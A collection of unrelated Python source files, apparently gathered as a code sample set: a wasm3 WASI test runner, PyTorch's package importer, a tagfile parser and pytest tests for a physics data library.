"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["16", "64"],
"expect_sha1": "d85df3561eb15f6f0e6f20d5640e8e1306222c6d"
}, {
"skip": True, # Fails on Windows on CI only, CNR
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "STREAM",
"wasm": "./wasi/stream/stream.wasm",
"expect_pattern": "----*Solution Validates:*on all three arrays*----*"
}, {
# TODO "if": { "file_exists": "./self-hosting/wasm3-fib.wasm" },
"name": "Self-hosting",
"wasm": "./self-hosting/wasm3-fib.wasm",
"expect_pattern": "wasm3 on WASM*Result: 832040*Elapsed: * ms*"
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "8eacda4b80fc816cad185330caa7556e19643dff"
}, {
"name": "CoreMark",
"wasm": "./wasi/coremark/coremark.wasm",
"expect_pattern": "*Correct operation validated.*CoreMark 1.0 : * / Clang* / STATIC*"
}
]
commands_fast = [
{
"name": "Simple WASI test",
"wasm": "./wasi/simple/test.wasm",
"args": ["cat", "./wasi/simple/0.txt"],
"expect_pattern": "Hello world*Constructor OK*Args: *; cat; ./wasi/simple/0.txt;*fib(20) = 6765* ms*48 65 6c 6c 6f 20 77 6f 72 6c 64*=== done ===*"
}, {
"skip": True, # Backtraces not enabled by default
"name": "Simple WASI test",
"wasm": "./wasi/test.wasm",
"args": ["trap"],
"can_crash": True,
"expect_pattern": "Hello world*Constructor OK*Args: *; trap;* wasm backtrace:* 6: 0x*Error:* unreachable executed*"
}, {
"name": "mandelbrot",
"wasm": "./wasi/mandelbrot/mandel.wasm",
"args": ["32", "4e5"],
"expect_sha1": "1fdb7dea7ec0f2465054cc623dc5a7225a876361"
}, {
"name": "mandelbrot (doubledouble)",
"wasm": "./wasi/mandelbrot/mandel_dd.wasm",
"args": ["32", "4e5"],
"expect_sha1": "b6d3c158a5c0dff1f6e82a3556c071e4f8b9e3f0"
}, {
"name": "C-Ray",
"stdin": "./wasi/c-ray/scene",
"wasm": "./wasi/c-ray/c-ray.wasm",
"args": ["-s", "32x32"],
"expect_sha1": "05af9604bf352234276e4d64e84b8d666574316c"
}, {
"name": "smallpt (explicit light sampling)",
"wasm": "./wasi/smallpt/smallpt-ex.wasm",
"args": ["4", "32"],
"expect_sha1": "ea05d85998b2f453b588ef76a1256215bf9b851c"
}, {
"name": "mal",
"wasm": "./wasi/mal/mal.wasm",
"args": ["./wasi/mal/test-fib.mal", "16"],
"expect_pattern": "987\n",
}, {
"name": "Brotli",
"stdin": "./wasi/brotli/alice29_small.txt",
"wasm": "./wasi/brotli/brotli.wasm",
"args": ["-c", "-f"],
"expect_sha1": "0e8af02a7207c0c617d7d38eed92853c4a619987"
}
]
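# Each entry above is a plain dict consumed by the runner below. Recognized
# keys: name, wasm, args, stdin (a file piped to the process), expect_pattern
# (an fnmatch-style glob), expect_sha1 (digest of raw stdout), skip, and
# can_crash. A hypothetical new entry would look like:
# {
#     "name": "my test",
#     "wasm": "./wasi/my/test.wasm",
#     "args": ["128"],
#     "expect_pattern": "expected output*",
# }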
def fail(msg):
print(f"{ansi.FAIL}FAIL:{ansi.ENDC} {msg}")
stats.failed += 1
commands = commands_fast if args.fast else commands_full
for cmd in commands:
if "skip" in cmd:
continue
command = args.exec.split(' ')
command.append(cmd['wasm'])
if "args" in cmd:
if args.separate_args:
command.append("--")
command.extend(cmd['args'])
command = list(map(str, command))
print(f"=== {cmd['name']} ===")
stats.total_run += 1
try:
if "stdin" in cmd:
fn = cmd['stdin']
f = open(fn, "rb")
print(f"cat {fn} | {' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout, stdin=f)
elif "can_crash" in cmd:
print(f"{' '.join(command)}")
output = subprocess.run(command, timeout=args.timeout, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
else:
print(f"{' '.join(command)}")
output = subprocess.check_output(command, timeout=args.timeout)
except subprocess.TimeoutExpired:
stats.timeout += 1
fail("Timeout")
continue
except subprocess.CalledProcessError:
stats.crashed += 1
fail("Crashed")
continue
if "expect_sha1" in cmd:
actual = hashlib.sha1(output).hexdigest()
if actual != cmd['expect_sha1']:
fail(f"Actual sha1: {actual}")
if "expect_pattern" in cmd:
actual = output.decode("utf-8")
if not fnmatch.fnmatch(actual, cmd['expect_pattern']):
fail(f"Output does not match pattern:\n{actual}")
print()
pprint(stats)
if stats.failed:
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {stats.failed}/{stats.total_run}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
else:
print(f"{ansi.OKGREEN}=======================")
print(f" All {stats.total_run} tests OK")
print(f"======================={ansi.ENDC}")
|
from .amine import *
from .aldehyde import *
from .halogen import *
from .misc import *
|
import builtins
import importlib
import inspect
import io
import linecache
import os.path
import types
from contextlib import contextmanager
from pathlib import Path
from typing import Any, BinaryIO, Callable, cast, Dict, List, Optional, Union
from weakref import WeakValueDictionary
import torch
from torch.serialization import _get_restore_location, _maybe_decode_ascii
from ._directory_reader import DirectoryReader
from ._importlib import (
_calc___package__,
_normalize_line_endings,
_normalize_path,
_resolve_name,
_sanity_check,
)
from ._mangling import demangle, PackageMangler
from ._package_unpickler import PackageUnpickler
from .file_structure_representation import _create_directory_from_file_list, Directory
from .glob_group import GlobPattern
from .importer import Importer
class PackageImporter(Importer):
"""Importers allow you to load code written to packages by :class:`PackageExporter`.
Code is loaded in a hermetic way, using files from the package
rather than the normal python import system. This allows
for the packaging of PyTorch model code and data so that it can be run
on a server or used in the future for transfer learning.
The importer for packages ensures that code in the module can only be loaded from
within the package, except for modules explicitly listed as external during export.
The file ``extern_modules`` in the zip archive lists all the modules that a package externally depends on.
This prevents "implicit" dependencies where the package runs locally because it is importing
a locally-installed package, but then fails when the package is copied to another machine.
"""
"""The dictionary of already loaded modules from this package, equivalent to ``sys.modules`` but
local to this importer.
"""
torch._C._log_api_usage_once("torch.package.PackageImporter")
modules: Dict[str, types.ModuleType]
def __init__(
self,
file_or_buffer: Union[str, torch._C.PyTorchFileReader, Path, BinaryIO],
module_allowed: Callable[[str], bool] = lambda module_name: True,
):
"""Open ``file_or_buffer`` for importing. This checks that the imported package only requires modules
allowed by ``module_allowed``
Args:
file_or_buffer: a file-like object (has to implement :meth:`read`, :meth:`readline`, :meth:`tell`, and :meth:`seek`),
a string, or an ``os.PathLike`` object containing a filename.
module_allowed (Callable[[str], bool], optional): A method to determine if a externally provided module
should be allowed. Can be used to ensure packages loaded do not depend on modules that the server
does not support. Defaults to allowing anything.
Raises:
ImportError: If the package will use a disallowed module.
"""
        torch._C._log_api_usage_once("torch.package.PackageImporter")
        self.zip_reader: Any
if isinstance(file_or_buffer, torch._C.PyTorchFileReader):
self.filename = "<pytorch_file_reader>"
self.zip_reader = file_or_buffer
elif isinstance(file_or_buffer, (Path, str)):
self.filename = str(file_or_buffer)
if not os.path.isdir(self.filename):
self.zip_reader = torch._C.PyTorchFileReader(self.filename)
else:
self.zip_reader = DirectoryReader(self.filename)
else:
self.filename = "<binary>"
self.zip_reader = torch._C.PyTorchFileReader(file_or_buffer)
self.root = _PackageNode(None)
self.modules = {}
self.extern_modules = self._read_extern()
for extern_module in self.extern_modules:
if not module_allowed(extern_module):
raise ImportError(
f"package '{file_or_buffer}' needs the external module '{extern_module}' "
f"but that module has been disallowed"
)
self._add_extern(extern_module)
for fname in self.zip_reader.get_all_records():
self._add_file(fname)
self.patched_builtins = builtins.__dict__.copy()
self.patched_builtins["__import__"] = self.__import__
# Allow packaged modules to reference their PackageImporter
self.modules["torch_package_importer"] = self # type: ignore[assignment]
self._mangler = PackageMangler()
        # used for reduce deserialization
self.storage_context: Any = None
self.last_map_location = None
# used for torch.serialization._load
self.Unpickler = lambda *args, **kwargs: PackageUnpickler(self, *args, **kwargs)
def import_module(self, name: str, package=None):
"""Load a module from the package if it hasn't already been loaded, and then return
the module. Modules are loaded locally
to the importer and will appear in ``self.modules`` rather than ``sys.modules``.
Args:
name (str): Fully qualified name of the module to load.
package ([type], optional): Unused, but present to match the signature of importlib.import_module. Defaults to ``None``.
Returns:
types.ModuleType: The (possibly already) loaded module.
"""
# We should always be able to support importing modules from this package.
# This is to support something like:
# obj = importer.load_pickle(...)
# importer.import_module(obj.__module__) <- this string will be mangled
#
# Note that _mangler.demangle will not demangle any module names
# produced by a different PackageImporter instance.
name = self._mangler.demangle(name)
return self._gcd_import(name)
def load_binary(self, package: str, resource: str) -> bytes:
"""Load raw bytes.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
Returns:
bytes: The loaded data.
"""
path = self._zipfile_path(package, resource)
return self.zip_reader.get_record(path)
def load_text(
self,
package: str,
resource: str,
encoding: str = "utf-8",
errors: str = "strict",
) -> str:
"""Load a string.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
encoding (str, optional): Passed to ``decode``. Defaults to ``'utf-8'``.
errors (str, optional): Passed to ``decode``. Defaults to ``'strict'``.
Returns:
str: The loaded text.
"""
data = self.load_binary(package, resource)
return data.decode(encoding, errors)
def load_pickle(self, package: str, resource: str, map_location=None) -> Any:
"""Unpickles the resource from the package, loading any modules that are needed to construct the objects
using :meth:`import_module`.
Args:
package (str): The name of module package (e.g. ``"my_package.my_subpackage"``).
resource (str): The unique name for the resource.
map_location: Passed to `torch.load` to determine how tensors are mapped to devices. Defaults to ``None``.
Returns:
Any: The unpickled object.
"""
pickle_file = self._zipfile_path(package, resource)
restore_location = _get_restore_location(map_location)
loaded_storages = {}
loaded_reduces = {}
storage_context = torch._C.DeserializationStorageContext()
def load_tensor(dtype, size, key, location, restore_location):
name = f"{key}.storage"
if storage_context.has_storage(name):
storage = storage_context.get_storage(name, dtype).storage()
else:
tensor = self.zip_reader.get_storage_from_record(
".data/" + name, size, dtype
)
if isinstance(self.zip_reader, torch._C.PyTorchFileReader):
storage_context.add_storage(name, tensor)
storage = tensor.storage()
loaded_storages[key] = restore_location(storage, location)
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == "storage":
storage_type, key, location, size = data
dtype = storage_type.dtype
if key not in loaded_storages:
load_tensor(
dtype,
size,
key,
_maybe_decode_ascii(location),
restore_location,
)
storage = loaded_storages[key]
# TODO: Once we decide to break serialization FC, we can
# stop wrapping with _TypedStorage
return torch.storage._TypedStorage(
wrap_storage=storage._untyped(), dtype=dtype
)
elif typename == "reduce_package":
# to fix BC breaking change, objects on this load path
# will be loaded multiple times erroneously
if len(data) == 2:
func, args = data
return func(self, *args)
reduce_id, func, args = data
if reduce_id not in loaded_reduces:
loaded_reduces[reduce_id] = func(self, *args)
return loaded_reduces[reduce_id]
            else:
                raise RuntimeError(
                    f"Unknown typename for persistent_load, expected 'storage' or "
                    f"'reduce_package' but got '{typename}'"
                )
# Load the data (which may in turn use `persistent_load` to load tensors)
data_file = io.BytesIO(self.zip_reader.get_record(pickle_file))
unpickler = self.Unpickler(data_file)
unpickler.persistent_load = persistent_load # type: ignore[assignment]
@contextmanager
def set_deserialization_context():
            # to let reduce_package access the deserialization context
self.storage_context = storage_context
self.last_map_location = map_location
try:
yield
finally:
self.storage_context = None
self.last_map_location = None
with set_deserialization_context():
result = unpickler.load()
# TODO from zdevito:
# This stateful weird function will need to be removed in our efforts
# to unify the format. It has a race condition if multiple python
# threads try to read independent files
torch._utils._validate_loaded_sparse_tensors()
return result
def id(self):
"""
Returns internal identifier that torch.package uses to distinguish :class:`PackageImporter` instances.
Looks like::
<torch_package_0>
"""
return self._mangler.parent_name()
def file_structure(
self, *, include: "GlobPattern" = "**", exclude: "GlobPattern" = ()
) -> Directory:
"""Returns a file structure representation of package's zipfile.
Args:
include (Union[List[str], str]): An optional string e.g. ``"my_package.my_subpackage"``, or optional list of strings
                for the names of the files to be included in the zipfile representation. This can also be
a glob-style pattern, as described in :meth:`PackageExporter.mock`
exclude (Union[List[str], str]): An optional pattern that excludes files whose name match the pattern.
Returns:
:class:`Directory`
"""
return _create_directory_from_file_list(
self.filename, self.zip_reader.get_all_records(), include, exclude
)
def python_version(self):
"""Returns the version of python that was used to create this package.
Note: this function is experimental and not Forward Compatible. The plan is to move this into a lock
file later on.
Returns:
:class:`Optional[str]` a python version e.g. 3.8.9 or None if no version was stored with this package
"""
python_version_path = ".data/python_version"
return (
self.zip_reader.get_record(python_version_path).decode("utf-8").strip()
if self.zip_reader.has_record(python_version_path)
else None
)
def _read_extern(self):
return (
self.zip_reader.get_record(".data/extern_modules")
.decode("utf-8")
.splitlines(keepends=False)
)
def _make_module(
self, name: str, filename: Optional[str], is_package: bool, parent: str
):
mangled_filename = self._mangler.mangle(filename) if filename else None
spec = importlib.machinery.ModuleSpec(
name,
self, # type: ignore[arg-type]
origin="<package_importer>",
is_package=is_package,
)
module = importlib.util.module_from_spec(spec)
self.modules[name] = module
module.__name__ = self._mangler.mangle(name)
ns = module.__dict__
ns["__spec__"] = spec
ns["__loader__"] = self
ns["__file__"] = mangled_filename
ns["__cached__"] = None
ns["__builtins__"] = self.patched_builtins
ns["__torch_package__"] = True
# Add this module to our private global registry. It should be unique due to mangling.
assert module.__name__ not in _package_imported_modules
_package_imported_modules[module.__name__] = module
# pre-emptively install on the parent to prevent IMPORT_FROM from trying to
# access sys.modules
self._install_on_parent(parent, name, module)
if filename is not None:
assert mangled_filename is not None
# pre-emptively install the source in `linecache` so that stack traces,
# `inspect`, etc. work.
assert filename not in linecache.cache # type: ignore[attr-defined]
linecache.lazycache(mangled_filename, ns)
code = self._compile_source(filename, mangled_filename)
exec(code, ns)
return module
def _load_module(self, name: str, parent: str):
cur: _PathNode = self.root
for atom in name.split("."):
if not isinstance(cur, _PackageNode) or atom not in cur.children:
raise ModuleNotFoundError(
f'No module named "{name}" in self-contained archive "{self.filename}"'
f" and the module is also not in the list of allowed external modules: {self.extern_modules}",
name=name,
)
cur = cur.children[atom]
if isinstance(cur, _ExternNode):
module = self.modules[name] = importlib.import_module(name)
return module
return self._make_module(name, cur.source_file, isinstance(cur, _PackageNode), parent) # type: ignore[attr-defined]
def _compile_source(self, fullpath: str, mangled_filename: str):
source = self.zip_reader.get_record(fullpath)
source = _normalize_line_endings(source)
return compile(source, mangled_filename, "exec", dont_inherit=True)
# note: named `get_source` so that linecache can find the source
# when this is the __loader__ of a module.
def get_source(self, module_name) -> str:
# linecache calls `get_source` with the `module.__name__` as the argument, so we must demangle it here.
module = self.import_module(demangle(module_name))
return self.zip_reader.get_record(demangle(module.__file__)).decode("utf-8")
# note: named `get_resource_reader` so that importlib.resources can find it.
# This is otherwise considered an internal method.
def get_resource_reader(self, fullname):
try:
package = self._get_package(fullname)
except ImportError:
return None
if package.__loader__ is not self:
return None
return _PackageResourceReader(self, fullname)
def _install_on_parent(self, parent: str, name: str, module: types.ModuleType):
if not parent:
return
# Set the module as an attribute on its parent.
parent_module = self.modules[parent]
if parent_module.__loader__ is self:
setattr(parent_module, name.rpartition(".")[2], module)
# note: copied from cpython's import code, with call to create module replaced with _make_module
def _do_find_and_load(self, name):
path = None
parent = name.rpartition(".")[0]
if parent:
if parent not in self.modules:
self._gcd_import(parent)
# Crazy side-effects!
if name in self.modules:
return self.modules[name]
parent_module = self.modules[parent]
try:
path = parent_module.__path__ # type: ignore[attr-defined]
except AttributeError:
msg = (_ERR_MSG + "; {!r} is not a package").format(name, parent)
raise ModuleNotFoundError(msg, name=name) from None
module = self._load_module(name, parent)
self._install_on_parent(parent, name, module)
return module
# note: copied from cpython's import code
def _find_and_load(self, name):
module = self.modules.get(name, _NEEDS_LOADING)
if module is _NEEDS_LOADING:
return self._do_find_and_load(name)
if module is None:
message = "import of {} halted; " "None in sys.modules".format(name)
raise ModuleNotFoundError(message, name=name)
# To handle https://github.com/pytorch/pytorch/issues/57490, where std's
# creation of fake submodules via the hacking of sys.modules is not import
# friendly
if name == "os":
self.modules["os.path"] = cast(Any, module).path
elif name == "typing":
self.modules["typing.io"] = cast(Any, module).io
self.modules["typing.re"] = cast(Any, module).re
return module
def _gcd_import(self, name, package=None, level=0):
"""Import and return the module based on its name, the package the call is
being made from, and the level adjustment.
This function represents the greatest common denominator of functionality
between import_module and __import__. This includes setting __package__ if
the loader did not.
"""
_sanity_check(name, package, level)
if level > 0:
name = _resolve_name(name, package, level)
return self._find_and_load(name)
# note: copied from cpython's import code
def _handle_fromlist(self, module, fromlist, *, recursive=False):
"""Figure out what __import__ should return.
The import_ parameter is a callable which takes the name of module to
import. It is required to decouple the function from assuming importlib's
import implementation is desired.
"""
module_name = demangle(module.__name__)
# The hell that is fromlist ...
# If a package was imported, try to import stuff from fromlist.
if hasattr(module, "__path__"):
for x in fromlist:
if not isinstance(x, str):
if recursive:
where = module_name + ".__all__"
else:
where = "``from list''"
raise TypeError(
f"Item in {where} must be str, " f"not {type(x).__name__}"
)
elif x == "*":
if not recursive and hasattr(module, "__all__"):
self._handle_fromlist(module, module.__all__, recursive=True)
elif not hasattr(module, x):
from_name = "{}.{}".format(module_name, x)
try:
self._gcd_import(from_name)
except ModuleNotFoundError as exc:
# Backwards-compatibility dictates we ignore failed
# imports triggered by fromlist for modules that don't
# exist.
if (
exc.name == from_name
and self.modules.get(from_name, _NEEDS_LOADING) is not None
):
continue
raise
return module
def __import__(self, name, globals=None, locals=None, fromlist=(), level=0):
if level == 0:
module = self._gcd_import(name)
else:
globals_ = globals if globals is not None else {}
package = _calc___package__(globals_)
module = self._gcd_import(name, package, level)
if not fromlist:
# Return up to the first dot in 'name'. This is complicated by the fact
# that 'name' may be relative.
if level == 0:
return self._gcd_import(name.partition(".")[0])
elif not name:
return module
else:
# Figure out where to slice the module's name up to the first dot
# in 'name'.
cut_off = len(name) - len(name.partition(".")[0])
# Slice end needs to be positive to alleviate need to special-case
# when ``'.' not in name``.
module_name = demangle(module.__name__)
return self.modules[module_name[: len(module_name) - cut_off]]
else:
return self._handle_fromlist(module, fromlist)
def _get_package(self, package):
"""Take a package name or module object and return the module.
If a name, the module is imported. If the passed or imported module
object is not a package, raise an exception.
"""
if hasattr(package, "__spec__"):
if package.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package.__spec__.name))
else:
return package
else:
module = self.import_module(package)
if module.__spec__.submodule_search_locations is None:
raise TypeError("{!r} is not a package".format(package))
else:
return module
def _zipfile_path(self, package, resource=None):
package = self._get_package(package)
assert package.__loader__ is self
name = demangle(package.__name__)
if resource is not None:
resource = _normalize_path(resource)
return f"{name.replace('.', '/')}/{resource}"
else:
return f"{name.replace('.', '/')}"
def _get_or_create_package(
self, atoms: List[str]
) -> "Union[_PackageNode, _ExternNode]":
cur = self.root
for i, atom in enumerate(atoms):
node = cur.children.get(atom, None)
if node is None:
node = cur.children[atom] = _PackageNode(None)
if isinstance(node, _ExternNode):
return node
if isinstance(node, _ModuleNode):
name = ".".join(atoms[:i])
raise ImportError(
f"inconsistent module structure. module {name} is not a package, but has submodules"
)
assert isinstance(node, _PackageNode)
cur = node
return cur
def _add_file(self, filename: str):
"""Assembles a Python module out of the given file. Will ignore files in the .data directory.
Args:
filename (str): the name of the file inside of the package archive to be added
"""
*prefix, last = filename.split("/")
if len(prefix) > 1 and prefix[0] == ".data":
return
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
raise ImportError(
f"inconsistent module structure. package contains a module file {filename}"
f" that is a subpackage of a module marked external."
)
if last == "__init__.py":
package.source_file = filename
elif last.endswith(".py"):
package_name = last[: -len(".py")]
package.children[package_name] = _ModuleNode(filename)
def _add_extern(self, extern_name: str):
*prefix, last = extern_name.split(".")
package = self._get_or_create_package(prefix)
if isinstance(package, _ExternNode):
return # the shorter extern covers this extern case
package.children[last] = _ExternNode()
_NEEDS_LOADING = object()
_ERR_MSG_PREFIX = "No module named "
_ERR_MSG = _ERR_MSG_PREFIX + "{!r}"
class _PathNode:
pass
class _PackageNode(_PathNode):
def __init__(self, source_file: Optional[str]):
self.source_file = source_file
self.children: Dict[str, _PathNode] = {}
class _ModuleNode(_PathNode):
__slots__ = ["source_file"]
def __init__(self, source_file: str):
self.source_file = source_file
class _ExternNode(_PathNode):
pass
# A private global registry of all modules that have been package-imported.
_package_imported_modules: WeakValueDictionary = WeakValueDictionary()
# `inspect` by default only looks in `sys.modules` to find source files for classes.
# Patch it to check our private registry of package-imported modules as well.
_orig_getfile = inspect.getfile
def patched_getfile(object):
if inspect.isclass(object):
if object.__module__ in _package_imported_modules:
return _package_imported_modules[object.__module__].__file__
return _orig_getfile(object)
inspect.getfile = patched_getfile
class _PackageResourceReader:
"""Private class used to support PackageImporter.get_resource_reader().
    Conforms to the importlib.abc.ResourceReader interface. Allowed to access
the innards of PackageImporter.
"""
def __init__(self, importer, fullname):
self.importer = importer
self.fullname = fullname
def open_resource(self, resource):
from io import BytesIO
return BytesIO(self.importer.load_binary(self.fullname, resource))
def resource_path(self, resource):
# The contract for resource_path is that it either returns a concrete
# file system path or raises FileNotFoundError.
if isinstance(
self.importer.zip_reader, DirectoryReader
) and self.importer.zip_reader.has_record(
os.path.join(self.fullname, resource)
):
return os.path.join(
self.importer.zip_reader.directory, self.fullname, resource
)
raise FileNotFoundError
def is_resource(self, name):
path = self.importer._zipfile_path(self.fullname, name)
return self.importer.zip_reader.has_record(path)
def contents(self):
from pathlib import Path
filename = self.fullname.replace(".", "/")
fullname_path = Path(self.importer._zipfile_path(self.fullname))
files = self.importer.zip_reader.get_all_records()
subdirs_seen = set()
for filename in files:
try:
relative = Path(filename).relative_to(fullname_path)
except ValueError:
continue
# If the path of the file (which is relative to the top of the zip
# namespace), relative to the package given when the resource
# reader was created, has a parent, then it's a name in a
# subdirectory and thus we skip it.
parent_name = relative.parent.name
if len(parent_name) == 0:
yield relative.name
elif parent_name not in subdirs_seen:
subdirs_seen.add(parent_name)
yield parent_name
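# A minimal usage sketch (hypothetical archive and resource names; assumes a
# package previously written with torch.package.PackageExporter):
#
# importer = PackageImporter("model_package.pt")
# model = importer.load_pickle("models", "model.pkl", map_location="cpu")
# source = importer.get_source("my_package.my_module")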
|
# Copyright 2021 Coastal Carolina University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import time
def parse_tagfile(filepath, optional=False):
result = []
pick = [ 'ADD' ]
if optional:
pick.append('OPT')
#
with open(filepath, 'r') as fh:
line = fh.readline()
while line:
stripped = line.partition('#')[0].strip()
pieces = stripped.split(':')
if len(pieces) == 2 and pieces[1].strip().upper() in pick:
result.append(pieces[0].strip())
#
line = fh.readline()
#
#
return result
#
def write_tagfile(outpath, names, action='ADD'):
header = '# Tagfile generated ' + time.strftime('%a %b %d %H:%M:%S %Z %Y', time.gmtime())
with open(outpath, 'w') as fh:
fh.write(header + '\n')
for name in names:
fh.write(name + ': ' + action.upper() + '\n')
#
#
#
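# A minimal round-trip sketch (hypothetical file path): write a tagfile,
# then read back the names marked ADD.
if __name__ == '__main__':  # pragma: no cover
    write_tagfile('/tmp/example.tagfile', ['pkg-one', 'pkg-two'], action='ADD')
    print(parse_tagfile('/tmp/example.tagfile'))  # -> ['pkg-one', 'pkg-two']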
|
import os
import pandas as pd
import numpy as np
import uproot
import h5py
from twaml.data import dataset
from twaml.data import scale_weight_sum
from twaml.data import from_root, from_pytables, from_h5
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds = from_root(
["tests/data/test_file.root"], name="myds", branches=branches, TeXlabel=r"$t\bar{t}$"
)
def test_name():
assert ds.name == "myds"
assert ds.TeXlabel == "$t\\bar{t}$"
def test_no_name():
dst = from_root(["tests/data/test_file.root"], branches=branches)
assert dst.name == "test_file.root"
def test_content():
ts = [uproot.open(f)[ds.tree_name] for f in ds.files]
raws = [t.array("pT_lep1") for t in ts]
    raw = np.concatenate(raws)
bins = np.linspace(0, 800, 21)
n1, bins1 = np.histogram(raw, bins=bins)
n2, bins2 = np.histogram(ds.df.pT_lep1.to_numpy(), bins=bins)
np.testing.assert_array_equal(n1, n2)
def test_nothing():
dst = from_root(["tests/data/test_file.root"], branches=branches)
assert dst.files[0].exists()
def test_with_executor():
lds = from_root(["tests/data/test_file.root"], branches=branches, nthreads=4)
np.testing.assert_array_almost_equal(lds.weights, ds.weights, 8)
def test_weight():
ts = [uproot.open(f)[ds.tree_name] for f in ds.files]
raws = [t.array("weight_nominal") for t in ts]
raw = np.concatenate(raws)
raw = raw * 150.0
ds.weights = ds.weights * 150.0
np.testing.assert_array_almost_equal(raw, ds.weights, 6)
def test_add():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = ds2.weights * 22
combined = ds + ds2
comb_w = np.concatenate([ds.weights, ds2.weights])
comb_df = pd.concat([ds.df, ds2.df])
np.testing.assert_array_almost_equal(comb_w, combined.weights, 5)
    np.testing.assert_array_almost_equal(comb_df.to_numpy(), combined.df.to_numpy(), 5)
assert ds.name == combined.name
assert ds.tree_name == combined.tree_name
assert ds.label == combined.label
def test_selection():
ds2 = from_root(
["tests/data/test_file.root"],
name="ds2",
selection="(reg2j2b==True) & (OS == True) & (pT_lep1 > 50)",
)
upt = uproot.open("tests/data/test_file.root")["WtLoop_nominal"]
reg2j2b = upt.array("reg2j2b")
OS = upt.array("OS")
pT_lep1 = upt.array("pT_lep1")
sel = np.logical_and(np.logical_and(reg2j2b, OS), pT_lep1 > 50)
w = upt.array("weight_nominal")[sel]
assert np.allclose(w, ds2.weights)
# np.testing.assert_array_almost_equal(w, ds2.weights)
def test_append():
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds1 = from_root(["tests/data/test_file.root"], name="myds", branches=branches)
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
ds2.weights = ds2.weights * 5
# raw
comb_w = np.concatenate([ds1.weights, ds2.weights])
comb_df = pd.concat([ds1.df, ds2.df])
# appended
ds1.append(ds2)
# now test
np.testing.assert_array_almost_equal(comb_w, ds1.weights, 5)
    np.testing.assert_array_almost_equal(comb_df.to_numpy(), ds1.df.to_numpy(), 5)
def test_auxweights():
branches = ["pT_lep1", "pT_lep2", "eta_lep1", "eta_lep2"]
ds1 = from_root(
["tests/data/test_file.root"],
name="myds",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
ds2 = from_root(
["tests/data/test_file.root"],
name="ds2",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
ds1.append(ds2)
dsa = from_root(
["tests/data/test_file.root"],
name="myds",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
dsb = from_root(
["tests/data/test_file.root"],
name="ds2",
branches=branches,
auxweights=["phi_lep1", "phi_lep2"],
)
dsc = dsa + dsb
np.testing.assert_array_almost_equal(
ds1.auxweights["phi_lep1"], dsc.auxweights["phi_lep1"], 5
)
dsc.change_weights("phi_lep2")
assert dsc.weight_name == "phi_lep2"
pl2 = uproot.open("tests/data/test_file.root")["WtLoop_nominal"].array("phi_lep2")
nw2 = uproot.open("tests/data/test_file.root")["WtLoop_nominal"].array("weight_nominal")
ds2.change_weights("phi_lep2")
np.testing.assert_array_almost_equal(ds2.weights, pl2, 5)
assert "phi_lep2" not in ds2.auxweights
assert "weight_nominal" in ds2.auxweights
ds2.to_pytables("outfile1.h5")
ds2pt = from_pytables("outfile1.h5", "ds2", weight_name="phi_lep2")
print(ds2pt.auxweights)
np.testing.assert_array_almost_equal(ds2pt.auxweights["weight_nominal"].to_numpy(), nw2)
os.remove("outfile1.h5")
assert True
def test_label():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
assert ds2.label is None
assert ds2.label_asarray() is None
ds2.label = 6
la = ds2.label_asarray()
la_raw = np.ones_like(ds2.weights, dtype=np.int64) * 6
np.testing.assert_array_equal(la, la_raw)
def test_auxlabel():
ds2 = from_root(["tests/data/test_file.root"], name="ds2", branches=branches)
assert ds2.auxlabel is None
assert ds2.auxlabel_asarray() is None
ds2.auxlabel = 3
assert ds2.auxlabel == 3
la = ds2.auxlabel_asarray()
la_raw = np.ones_like(ds2.weights, dtype=np.int64) * 3
np.testing.assert_array_equal(la, la_raw)
def test_save_and_read():
ds.to_pytables("outfile.h5")
new_ds = from_pytables("outfile.h5", ds.name)
X1 = ds.df.to_numpy()
X2 = new_ds.df.to_numpy()
w1 = ds.weights
w2 = new_ds.weights
np.testing.assert_array_almost_equal(X1, X2, 6)
np.testing.assert_array_almost_equal(w1, w2, 6)
def test_raw_h5():
inds = from_h5("tests/data/raw.h5", "WtLoop_nominal", ["pT_jet1", "nbjets", "met"])
